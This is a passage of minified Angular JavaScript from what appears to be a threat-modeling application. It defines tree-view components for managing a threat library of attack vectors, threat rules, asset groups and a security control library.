pe=null;pe=te==this.translate.instant("general.Group")?this.dataService.Config.CreateAttackVectorGroup(d):this.dataService.Config.CreateAttackVector(d),this.createNodes(),setTimeout(()=>{this.selectedNode=this.FindNodeOfObject(pe),this.selectedNode.isRenaming=!0},100)},canRename:!0,onRename:te=>{d.Name=te},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(d).subscribe(te=>{te&&(this.dataService.Config.DeleteAttackVectorGroup(d),this.selectedNode==Y&&(this.selectedNode=null),this.createNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let te=T.Data.attackVectorGroupIDs;if(0!=te.findIndex(pe=>pe==d.ID)){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe-1,1)[0]),k.children.splice(pe,0,k.children.splice(pe-1,1)[0])}},onMoveDown:()=>{let te=T.Data.attackVectorGroupIDs;if(te.findIndex(pe=>pe==d.ID)!=te.length-1){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe+1,1)[0]),k.children.splice(pe,0,k.children.splice(pe+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>q.filter(te=>te!=Y&&te!=k),onMoveToGroup:te=>{let pe="attackVectorGroupIDs";T.Data[pe].splice(T.Data[pe].indexOf(d.ID),1),te.data.Data[pe].push(d.ID),this.createNodes()}};return d.SubGroups.forEach(te=>{let pe=n(te,d,Y,q);Y.children.push(pe)}),d.AttackVectors.forEach(te=>Y.children.push(i(te,d,Y,q))),q.push(Y),Y},c=n(this.dataService.Config.ThreatLibrary,null,null,[]);c.icon="library_books",c.canSelect=!1,c.canDelete=!1,c.addOptions=null,c.canRename=!1,c.hasMenu=!0,this.Nodes.push(c),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-library"]],features:[ci],decls:1,vars:1,consts:[["style","margin-left: 10px; margin-right: 10px;",4,"ngIf"],[2,"margin-left","10px","margin-right","10px"],[4,"ngIf"],[3,"attackVector"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"]],template:function(e,i){1&e&&ne(0,Dft,9,3,"div",0),2&e&&V("ngIf",i.selectedNode)},dependencies:[Ri,an,Ta,Ea,nn,un,Go,Xa,Qg,Xi],styles:[".property-form-field[_ngcontent-%COMP%]{width:300px}"]}),t})();function wft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",4),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"textarea",5),he("ngModelChange",function(n){return be(e),Me(B(2).selectedThreatRuleGroup.Description=n)}),u(),s(9,"\n    "),u(),s(10,"\n  "),Mt()}if(2&t){const e=B(2);C(5),ke(re(6,3,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedThreatRuleGroup.Description)}}function Ift(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-checkbox",6),he("change",function(n){return be(e),Me(B(2).OnRulesActiveChange(n.checked))}),s(3),oe(4,"translate"),u(),s(5,"\n  "),Mt()}if(2&t){const e=B(2);C(2),V("checked",e.allGroupRulesActive)("indeterminate",e.someGroupRulesActive),C(1),ke(re(4,3,"properties.IsActive"))}}function Rft(t,a){if(1&t&&it(0,"app-threat-rule",7),2&t){const e=B(2);V("node",e.selectedNode)("threatRule",e.selectedThreatRule)}}function Sft(t,a){if(1&t&&(m(0,"div",1),s(1,"\n  "),m(2,"h2"),s(3),u(),s(4,"\n  "),ne(5,wft,11,5,"ng-container",2),s(6,"\n  "),s(7,"\n  "),ne(8,Ift,6,5,"ng-container",2),s(9,"\n  "),ne(10,Rft,1,2,"app-threat-rule",3),s(11,"\n"),u()),2&t){const e=B();C(3),ke(e.selectedNode.name()),C(2),V("ngIf",e.selectedThreatRuleGroup),C(3),V("ngIf",e.selectedThreatRuleGroup),C(2),V("ngIf",e.selectedThreatRule)}}let kft=(()=>{class t extends xa{constructor(e,i,n,r){super(),this.theme=e,this.dataService=i,this.dialog=n,this.translate=r,i.ConfigChanged.subscribe(c=>this.createNodes())}get selectedThreatRuleGroup(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof aM?this.selectedNode.data:null}get selectedThreatRule(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Vp?this.selectedNode.data:null}get allGroupRulesActive(){return!!this.selectedThreatRuleGroup&&this.selectedThreatRuleGroup.ThreatRules.every(e=>e.IsActive)}get someGroupRulesActive(){return!(!this.selectedThreatRuleGroup||this.allGroupRulesActive)&&this.selectedThreatRuleGroup.ThreatRules.length>0&&this.selectedThreatRuleGroup.ThreatRules.some(e=>e.IsActive)}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}OnRulesActiveChange(e){this.selectedThreatRuleGroup&&this.selectedThreatRuleGroup.ThreatRules.forEach(i=>i.IsActive=e)}createNodes(){const e=this.Nodes;if(this.Nodes=[],!this.dataService.Config)return;let i=(k,q,Y,te)=>{let pe={name:()=>k.Name,canSelect:!0,data:k,canRename:!0,onRename:Re=>{k.Name=Re},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(k).subscribe(Re=>{Re&&(this.dataService.Config.DeleteThreatRule(k),this.selectedNode==pe&&(this.selectedNode=null),this.createNodes())})},canDuplicate:!0,onDuplicate:()=>{let Re=this.dataService.Config.CreateThreatRule(q,on.DFD);Re.CopyFrom(k.Data),Re.Name=Re.Name+"-Copy",this.dataService.Config.GetThreatRuleGroups().find(Fe=>Fe.ThreatRules.includes(k)).AddThreatRule(Re),this.createNodes(),this.selectedNode=this.FindNodeOfObject(Re),this.selectedNode.isRenaming=!0},canMoveUpDown:!0,onMoveUp:()=>{let Re=q.Data.threatRuleIDs;if(0!=Re.findIndex(Fe=>Fe==k.ID)){let Fe=Re.findIndex(Ne=>Ne==k.ID);Re.splice(Fe,0,Re.splice(Fe-1,1)[0]),Y.children.splice(Fe,0,Y.children.splice(Fe-1,1)[0])}},onMoveDown:()=>{let Re=q.Data.threatRuleIDs;if(Re.findIndex(Fe=>Fe==k.ID)!=Re.length-1){let Fe=Re.findIndex(Ne=>Ne==k.ID);Re.splice(Fe,0,Re.splice(Fe+1,1)[0]),Y.children.splice(Fe,0,Y.children.splice(Fe+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>te.filter(Re=>Re!=Y),onMoveToGroup:Re=>{let Fe="threatRuleIDs";q.Data[Fe].splice(q.Data[Fe].indexOf(k.ID),1),Re.data.Data[Fe].push(k.ID),this.createNodes()}};return pe},n=(k,q,Y,te)=>{let pe={name:()=>k.Name,canSelect:!0,data:k,canAdd:!0,addOptions:[this.translate.instant("general.Group"),this.translate.instant("general.ThreatRule")],onAdd:Re=>{let Fe=null;Fe=Re==this.translate.instant("general.Group")?this.dataService.Config.CreateThreatRuleGroup(k):this.dataService.Config.CreateThreatRule(k,on.DFD),this.createNodes(),setTimeout(()=>{this.selectedNode=this.FindNodeOfObject(Fe),this.selectedNode.isRenaming=!0},100)},canRename:!0,onRename:Re=>{k.Name=Re},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(k).subscribe(Re=>{Re&&(this.dataService.Config.DeleteThreatRuleGroup(k),this.selectedNode==pe&&(this.selectedNode=null),this.createNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let Re=q.Data.threatRuleGroupIDs;if(0!=Re.findIndex(Fe=>Fe==k.ID)){let Fe=Re.findIndex(Ne=>Ne==k.ID);Re.splice(Fe,0,Re.splice(Fe-1,1)[0]),Y.children.splice(Fe,0,Y.children.splice(Fe-1,1)[0])}},onMoveDown:()=>{let Re=q.Data.threatRuleGroupIDs;if(Re.findIndex(Fe=>Fe==k.ID)!=Re.length-1){let Fe=Re.findIndex(Ne=>Ne==k.ID);Re.splice(Fe,0,Re.splice(Fe+1,1)[0]),Y.children.splice(Fe,0,Y.children.splice(Fe+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>te.filter(Re=>Re!=pe&&Re!=Y),onMoveToGroup:Re=>{let Fe="threatRuleGroupIDs";q.Data[Fe].splice(q.Data[Fe].indexOf(k.ID),1),Re.data.Data[Fe].push(k.ID),this.createNodes()}};return k.SubGroups.forEach(Re=>{let Fe=n(Re,k,pe,te);pe.children.push(Fe)}),k.ThreatRules.forEach(Re=>pe.children.push(i(Re,k,pe,te))),te.push(pe),pe},r=[],c=n(this.dataService.Config.DFDThreatRuleGroups,null,null,r);c.icon="compare_arrows",c.canSelect=!1,c.canDelete=!1;let d=n(this.dataService.Config.StencilThreatRuleGroups,null,null,r);d.icon="view_module",d.canSelect=!1,d.canDelete=!1,d.canAdd=!1;let T=n(this.dataService.Config.ComponentThreatRuleGroups,null,null,r);T.icon="code",T.canSelect=!1,T.canDelete=!1,T.canAdd=!1,this.Nodes.push(c),this.Nodes.push(d),this.Nodes.push(T),this.Nodes.forEach(k=>k.hasMenu=!0),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-rules"]],features:[ci],decls:1,vars:1,consts:[["style","margin-left: 10px; margin-right: 10px;",4,"ngIf"],[2,"margin-left","10px","margin-right","10px"],[4,"ngIf"],[3,"node","threatRule",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["color","primary",3,"checked","indeterminate","change"],[3,"node","threatRule"]],template:function(e,i){1&e&&ne(0,Sft,12,4,"div",0),2&e&&V("ngIf",i.selectedNode)},dependencies:[Ri,an,Ta,Ea,br,nn,un,Go,Xa,Gp,Xi]}),t})();function Pft(t,a){if(1&t){const e=Ye();m(0,"button",19),he("click",function(){return be(e),Me(B(3).selectedAssetGroup.Name="")}),oe(1,"translate"),s(2,"\n        "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n      "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function Oft(t,a){1&t&&(m(0,"mat-hint",23),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct("\n        ",re(2,1,"messages.error.numberAlreadyExists"),"\n      "))}function Nft(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",20),s(1,"\n      "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n      "),m(6,"input",21),he("ngModelChange",function(n){return be(e),Me(B(3).selectedAssetGroup.Number=n)}),u(),s(7,"\n      "),ne(8,Oft,3,3,"mat-hint",22),s(9,"\n    "),u()}if(2&t){const e=B(3);C(3),ke(re(4,4,"general.Number")),C(3),at("matTooltip",e.selectedAssetGroup.Number),V("ngModel",e.selectedAssetGroup.Number),C(2),V("ngIf",e.selectedAssetGroup.CheckUniqueNumber())}}function Lft(t,a){if(1&t){const e=Ye();m(0,"table",24),s(1,"\n        "),m(2,"tr")(3,"td")(4,"mat-checkbox",25),he("change",function(){const r=be(e).$implicit,c=B(3);return Me(c.ImpactCatChanged(c.selectedAssetGroup,r))}),s(5),oe(6,"translate"),u()()(),s(7,"\n      "),u()}if(2&t){const e=a.$implicit,i=B(3);C(4),V("checked",i.selectedAssetGroup.ImpactCats.includes(e)),C(1),ke(re(6,2,i.GetImpactCategoryName(e)))}}function zft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",10),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"input",11),he("ngModelChange",function(n){return be(e),Me(B(2).selectedAssetGroup.Name=n)}),u(),s(9,"\n      "),ne(10,Pft,6,3,"button",12),s(11,"\n    "),u(),s(12,"\n    "),ne(13,Nft,10,6,"mat-form-field",13),s(14,"\n    "),it(15,"br"),s(16,"\n    "),m(17,"mat-form-field",14),s(18,"\n      "),m(19,"mat-label"),s(20),oe(21,"translate"),u(),s(22,"\n      "),m(23,"textarea",15),he("ngModelChange",function(n){return be(e),Me(B(2).selectedAssetGroup.Description=n)}),u(),s(24,"\n    "),u(),s(25,"\n    "),m(26,"mat-checkbox",16),he("ngModelChange",function(n){return be(e),Me(B(2).selectedAssetGroup.IsActive=n)}),s(27),oe(28,"translate"),u(),s(29,"\n    "),m(30,"h3"),s(31),oe(32,"translate"),u(),s(33,"\n    "),m(34,"div",17),s(35,"\n      "),ne(36,Lft,8,4,"table",18),s(37,"\n    "),u(),s(38,"\n  "),Mt()}if(2&t){const e=B(2);C(5),ke(re(6,13,"general.Name")),C(3),at("matTooltip",e.selectedAssetGroup.Name),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedAssetGroup.Name),C(2),V("ngIf",e.selectedAssetGroup.Name),C(3),V("ngIf",e.selectedAssetGroup.IsNewAsset),C(7),ke(re(21,15,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedAssetGroup.Description),C(3),V("ngModel",e.selectedAssetGroup.IsActive),C(1),ke(re(28,17,"properties.IsActive")),C(4),ke(re(32,19,"properties.ImpactCategories")),C(5),V("ngForOf",e.GetImpactCategories())}}function Wft(t,a){if(1&t){const e=Ye();m(0,"button",34),he("click",function(){const r=be(e).$implicit,c=B().item;return Me(B(3).OnMoveToGroup(c,r))}),s(1),u()}if(2&t){const e=a.$implicit;C(1),ke(e.Name)}}function Fft(t,a){if(1&t&&(s(0,"\n              "),ne(1,Wft,2,1,"button",33),s(2,"\n            ")),2&t){const e=a.groups;C(1),V("ngForOf",e)}}const Vft=function(t,a){return{groups:t,item:a}};function Bft(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",26),he("click",function(){const r=be(e).$implicit;return Me(B(2).selectedMyData=r)}),s(1,"\n          "),m(2,"mat-icon",27),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",28),s(6),u(),s(7,"\n          "),m(8,"div",28),s(9),oe(10,"translate"),oe(11,"translate"),u(),s(12,"\n          "),m(13,"button",29),oe(14,"translate"),m(15,"mat-icon"),s(16,"low_priority"),u()(),s(17,"\n          "),m(18,"button",30),he("click",function(){const r=be(e).$implicit;return Me(B(2).DeleteMyData(r))}),oe(19,"translate"),m(20,"mat-icon"),s(21,"delete"),u()(),s(22,"\n          "),m(23,"mat-menu",null,31),s(25,"\n            "),ne(26,Fft,3,1,"ng-template",32),s(27," \n          "),u(),s(28,"\n        "),u()}if(2&t){const e=a.$implicit,i=Ti(24),n=B(2);Ct("highlight-light",n.selectedMyData===e&&!n.theme.IsDarkMode)("highlight-dark",n.selectedMyData===e&&n.theme.IsDarkMode),at("matTooltip",null==e?null:e.Name),C(6),ke(e.Name),C(3),za("",re(10,12,"properties.Sensitivity"),": ",re(11,14,n.GetSensitivity(e.Sensitivity)),""),C(4),at("matTooltip",re(14,16,"nav-tree.moveToGroup")),V("matMenuTriggerFor",i)("matMenuTriggerData",Ah(20,Vft,n.GetMoveToGroups(e),e)),C(5),at("matTooltip",re(19,18,"general.Delete"))}}function Hft(t,a){if(1&t&&(bt(0),s(1,"\n        "),m(2,"div",35),s(3,"\n          "),it(4,"app-mydata",36),s(5,"\n        "),u(),s(6,"\n      "),Mt()),2&t){const e=B(2);C(4),V("myData",e.selectedMyData)}}function Uft(t,a){if(1&t){const e=Ye();m(0,"div",1),s(1,"\n  "),ne(2,zft,39,21,"ng-container",2),s(3,"\n  "),m(4,"div",3),s(5,"\n    "),m(6,"div",4),s(7,"\n      "),m(8,"mat-list",5),he("cdkDropListDropped",function(n){be(e);const r=B();return Me(r.dropWrapper(n,r.selectedAssetGroup.AssociatedData))}),s(9,"\n        "),m(10,"div",6),s(11),oe(12,"translate"),m(13,"button",7),he("click",function(){return be(e),Me(B().AddMyData())}),oe(14,"translate"),m(15,"mat-icon"),s(16,"add"),u()()(),s(17,"\n        "),ne(18,Bft,29,23,"mat-list-item",8),s(19,"\n      "),u(),s(20,"\n    "),u(),s(21,"\n    "),m(22,"div",9),s(23,"\n      "),ne(24,Hft,7,1,"ng-container",2),s(25,"\n    "),u(),s(26,"\n  "),u(),s(27,"\n"),u()}if(2&t){const e=B();C(2),V("ngIf",e.selectedAssetGroup),C(6),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),ct("",re(12,9,"general.Datas")," "),C(2),at("matTooltip",re(14,11,"general.Add")),C(5),V("ngForOf",e.selectedAssetGroup.AssociatedData),C(6),V("ngIf",null==e.selectedAssetGroup.AssociatedData?null:e.selectedAssetGroup.AssociatedData.includes(e.selectedMyData))}}let DZ=(()=>{class t extends xa{constructor(e,i,n){super(),this.theme=e,this.dataService=i,this.dialog=n,this.selectedMyData=null,i.ConfigChanged.subscribe(r=>this.createNodes())}get selectedAssetGroup(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Zl?this.selectedNode.data:null}ngOnInit(){null==this.isProject&&console.error("isProject is unset"),setTimeout(()=>{this.createNodes()},100)}AddMyData(){let e;e=this.isProject?this.dataService.Project.CreateMyData(this.selectedAssetGroup):this.dataService.Config.CreateMyData(this.selectedAssetGroup),this.selectedMyData=e}DeleteMyData(e){this.isProject?this.dataService.Project.DeleteMyData(e):this.dataService.Config.DeleteMyData(e),this.selectedMyData==e&&(this.selectedMyData=null)}GetMoveToGroups(e){return this.assetGroup.GetGroupsFlat().filter(i=>!i.AssociatedData.includes(e))}OnMoveToGroup(e,i){this.assetGroup.GetGroupsFlat().find(r=>r.AssociatedData.includes(e)).RemoveMyData(e),i.AddMyData(e)}dropWrapper(e,i){let n=i.map(c=>c.ID);Qs(n,e.previousIndex,e.currentIndex);let r=[];n.forEach(c=>r.push(i.find(d=>d.ID==c))),this.selectedAssetGroup.AssociatedData=r}GetSensitivity(e){return An.ToString(e)}ImpactCatChanged(e,i){const n=e.ImpactCats.indexOf(i);n>=0?e.ImpactCats.splice(n,1):e.ImpactCats.push(i)}GetImpactCategories(){return Vs.GetKeys()}GetImpactCategoryName(e){return Vs.ToString(e)}createNodes(){const e=this.Nodes;this.Nodes=[];let i=null;i=this.isProject?this.dataService.Project:this.dataService.Config;let n=(r,c,d,T)=>{let k={name:()=>r.Name,canSelect:!0,canAdd:!0,isInactive:()=>!r.IsActive,data:r,onAdd:()=>{let q=i.CreateAssetGroup(r);this.createNodes(),this.selectedNode=this.FindNodeOfObject(q),this.selectedNode.isRenaming=!0},canRename:!0,onRename:q=>{r.Name=q},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(r).subscribe(q=>{q&&(i.DeleteAssetGroup(r),this.selectedNode==k&&(this.selectedNode=null),this.createNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let q=c.Data.assetGroupIDs;if(0!=q.findIndex(Y=>Y==r.ID)){let Y=q.findIndex(te=>te==r.ID);q.splice(Y,0,q.splice(Y-1,1)[0]),d.children.splice(Y,0,d.children.splice(Y-1,1)[0])}},onMoveDown:()=>{let q=c.Data.assetGroupIDs;if(q.findIndex(Y=>Y==r.ID)!=q.length-1){let Y=q.findIndex(te=>te==r.ID);q.splice(Y,0,q.splice(Y+1,1)[0]),d.children.splice(Y,0,d.children.splice(Y+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>T.filter(q=>q!=k&&q!=d),onMoveToGroup:q=>{let Y="assetGroupIDs";c.Data[Y].splice(c.Data[Y].indexOf(r.ID),1),q.data.Data[Y].push(r.ID),this.createNodes()}};return this.isProject&&r.IsNewAsset&&(k.icon="add_circle_outline",k.iconAlignLeft=!0),null==k.isExpanded&&!r.IsActive&&(k.isExpanded=!1),r.SubGroups.forEach(q=>{let Y=n(q,r,k,T);k.children.push(Y)}),T.push(k),k};if(this.assetGroup){let c=n(this.assetGroup,null,null,[]);c.icon=Zl.Icon,c.iconAlignLeft=!1,c.canDelete=!1,c.hasMenu=!0,this.Nodes.push(c),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-assets"]],inputs:{assetGroup:"assetGroup",isProject:"isProject"},features:[ci],decls:1,vars:1,consts:[["style","margin: 10px;",4,"ngIf"],[2,"margin","10px"],[4,"ngIf"],[1,"row"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["appearance","fill",1,"property-form-field"],["matInput","","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill","style","width: 70px; float: right; margin-left: 10px;",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["color","primary",3,"ngModel","ngModelChange"],[2,"margin-top","10px","display","flex","flex-wrap","wrap"],["style","min-width: 200px;",4,"ngFor","ngForOf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["appearance","fill",2,"width","70px","float","right","margin-left","10px"],["matInput","","type","number","min","0","required","","matTooltipShowDelay","1000",3,"ngModel","matTooltip","ngModelChange"],["style","color: red;","class","alert alert-danger",4,"ngIf"],[1,"alert","alert-danger",2,"color","red"],[2,"min-width","200px"],["color","primary",3,"checked","change"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto","margin-right","0px",3,"matMenuTriggerFor","matMenuTriggerData","matTooltip"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],["moveMenu","matMenu"],["matMenuContent",""],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["mat-menu-item","",3,"click"],[2,"margin-left","10px"],[3,"myData"]],template:function(e,i){1&e&&ne(0,Uft,28,13,"div",0),2&e&&V("ngIf",i.selectedNode)},dependencies:[Zi,Ri,an,Ac,Ta,gm,Ed,Ea,Rd,Sd,oa,br,da,nn,pp,un,jr,Go,Xa,es,ts,Or,Lr,rc,Xo,qo,po,Zc,Pa,v5,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}']}),t})();function qft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",4),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"textarea",5),he("ngModelChange",function(n){return be(e),Me(B(2).selectedControlGroup.Description=n)}),u(),s(9,"\n    "),u(),s(10,"\n  "),Mt()}if(2&t){const e=B(2);C(5),ke(re(6,3,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedControlGroup.Description)}}function Gft(t,a){if(1&t&&it(0,"app-control",6),2&t){const e=B(2);V("node",e.selectedNode)("control",e.selectedControl)}}function jft(t,a){if(1&t&&(m(0,"div",1),s(1,"\n  "),m(2,"h2"),s(3),u(),s(4,"\n  "),ne(5,qft,11,5,"ng-container",2),s(6,"\n  "),ne(7,Gft,1,2,"app-control",3),s(8,"\n"),u()),2&t){const e=B();C(3),ke(e.selectedNode.name()),C(2),V("ngIf",e.selectedControlGroup),C(2),V("ngIf",e.selectedControl)}}let Qft=(()=>{class t extends xa{constructor(e,i,n,r){super(),this.theme=e,this.dataService=i,this.dialog=n,this.translate=r,i.ConfigChanged.subscribe(c=>this.createNodes())}get selectedControlGroup(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Yb?this.selectedNode.data:null}get selectedControl(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Fg?this.selectedNode.data:null}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}createNodes(){const e=this.Nodes;this.Nodes=[];let i=(d,T,k,q)=>{let Y={name:()=>d.Name,canSelect:!0,data:d,canRename:!0,onRename:te=>{d.Name=te},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(d).subscribe(te=>{te&&(this.dataService.Config.DeleteControl(d),this.selectedNode==Y&&(this.selectedNode=null),this.createNodes())})},canDuplicate:!0,onDuplicate:()=>{let te=this.dataService.Config.CreateControl(T);te.CopyFrom(d.Data),te.Name=te.Name+"-Copy",this.dataService.Config.GetControlGroups().find(pe=>pe.Controls.includes(d)).AddControl(te),this.createNodes(),this.selectedNode=this.FindNodeOfObject(te),this.selectedNode.isRenaming=!0},canMoveUpDown:!0,onMoveUp:()=>{let te=T.Data.controlIDs;if(0!=te.findIndex(pe=>pe==d.ID)){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe-1,1)[0]),k.children.splice(pe,0,k.children.splice(pe-1,1)[0])}},onMoveDown:()=>{let te=T.Data.controlIDs;if(te.findIndex(pe=>pe==d.ID)!=te.length-1){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe+1,1)[0]),k.children.splice(pe,0,k.children.splice(pe+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>q.filter(te=>te!=k),onMoveToGroup:te=>{let pe="controlIDs";T.Data[pe].splice(T.Data[pe].indexOf(d.ID),1),te.data.Data[pe].push(d.ID),this.createNodes()}};return Y},n=(d,T,k,q)=>{let Y={name:()=>d.Name,canSelect:!0,data:d,canAdd:!0,addOptions:[this.translate.instant("general.Group"),this.translate.instant("general.Control")],onAdd:te=>{let pe=null;pe=te==this.translate.instant("general.Group")?this.dataService.Config.CreateControlGroup(d):this.dataService.Config.CreateControl(d),this.createNodes(),setTimeout(()=>{this.selectedNode=this.FindNodeOfObject(pe),this.selectedNode.isRenaming=!0},100)},canRename:!0,onRename:te=>{d.Name=te},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(d).subscribe(te=>{te&&(this.dataService.Config.DeleteControlGroup(d),this.selectedNode==Y&&(this.selectedNode=null),this.createNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let te=T.Data.controlGroupIDs;if(0!=te.findIndex(pe=>pe==d.ID)){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe-1,1)[0]),k.children.splice(pe,0,c.children.splice(pe-1,1)[0])}},onMoveDown:()=>{let te=T.Data.controlGroupIDs;if(te.findIndex(pe=>pe==d.ID)!=te.length-1){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe+1,1)[0]),k.children.splice(pe,0,c.children.splice(pe+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>q.filter(te=>te!=Y&&te!=k),onMoveToGroup:te=>{let pe="controlGroupIDs";T.Data[pe].splice(T.Data[pe].indexOf(d.ID),1),te.data.Data[pe].push(d.ID),this.createNodes()}};return d.SubGroups.forEach(te=>{let pe=n(te,d,Y,q);Y.children.push(pe)}),d.Controls.forEach(te=>Y.children.push(i(te,d,Y,q))),q.push(Y),Y},c=n(this.dataService.Config.ControlLibrary,null,null,[]);c.icon="security",c.canSelect=!1,c.canDelete=!1,c.hasMenu=!0,this.Nodes.push(c),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}return t.\u0275fac=function(e){return 